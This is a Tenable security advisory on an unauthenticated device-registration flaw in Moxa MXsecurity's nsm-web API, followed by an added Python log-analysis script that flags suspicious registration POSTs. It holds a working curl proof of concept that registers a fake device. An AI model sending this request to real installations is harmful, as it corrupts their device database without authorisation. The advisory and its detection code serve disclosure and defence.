Moxa MXsecurity Unauthenticated Device Registration
Sept. 5, 2023, 1:14 p.m. | Jimi Sebree
Tenable Research Advisories www.tenable.com
A security issue regarding improper access controls has been discovered in Moxa MXsecurity V1.0.1-23021705. It allows an unauthenticated remote attacker to register/add devices via the nsm-web application. This pollutes the MXsecurity sqlite database and the nsm-web UI.
Proof of Concept
curl -k -H 'Content-Type: application/json' -d '{"mac":"11:11:11:11:11:11", "serialNumber":"1234", "modelName":"aaa", "hostname":"device_1", "firmwareVersion":"1.1", "location":"location_1"}' 'https://<host>/api/v1/devices/register'
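For detection, the following is an added example (not part of the Tenable advisory or Moxa's code) that flags POSTs to the registration endpoint coming from outside the networks where managed devices live. The combined-format access log, the DEVICE_NETS allow-list and the sample log lines are assumptions constructed for illustration; only the endpoint path comes from the proof of concept above.

```python
import ipaddress
import re
from collections import Counter

# Path taken from the advisory's proof of concept.
REGISTER_PATH = "/api/v1/devices/register"

# Assumption: combined-format access log from a reverse proxy in front of nsm-web.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Assumption: subnets where managed devices legitimately register from.
DEVICE_NETS = [ipaddress.ip_network("10.20.0.0/24")]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.20.0.15 - - [05/Sep/2023:09:01:12 +0000] "POST /api/v1/devices/register HTTP/1.1" 200 87
192.0.2.44 - - [05/Sep/2023:09:14:03 +0000] "POST /api/v1/devices/register HTTP/1.1" 200 87
192.0.2.44 - - [05/Sep/2023:09:14:04 +0000] "POST /api/v1/devices/register?x=1 HTTP/1.1" 200 87
192.0.2.44 - - [05/Sep/2023:09:14:09 +0000] "GET /login HTTP/1.1" 200 1532
198.51.100.7 - - [05/Sep/2023:09:20:00 +0000] "POST /api/v1/devices/register HTTP/1.1" 401 23
garbage line
"""

def suspicious_registrations(log_text, device_nets=DEVICE_NETS):
    """Return (src, ts, status) for register POSTs from outside device_nets."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparseable line or not a registration attempt
        if m["path"].split("?", 1)[0].rstrip("/") != REGISTER_PATH:
            continue  # ignore query string and trailing slash when matching
        try:
            src = ipaddress.ip_address(m["src"])
        except ValueError:
            continue  # hostname or malformed source field
        if not any(src in net for net in device_nets):
            hits.append((str(src), m["ts"], int(m["status"])))
    return hits

def accepted_by_source(hits):
    """Count registrations the server accepted (2xx), per source address."""
    return Counter(src for src, _, status in hits if 200 <= status < 300)

if __name__ == "__main__":
    print(accepted_by_source(suspicious_registrations(SAMPLE_LOG)))
```

Sources with accepted (2xx) registrations are the ones whose device entries should be reviewed in the nsm-web UI.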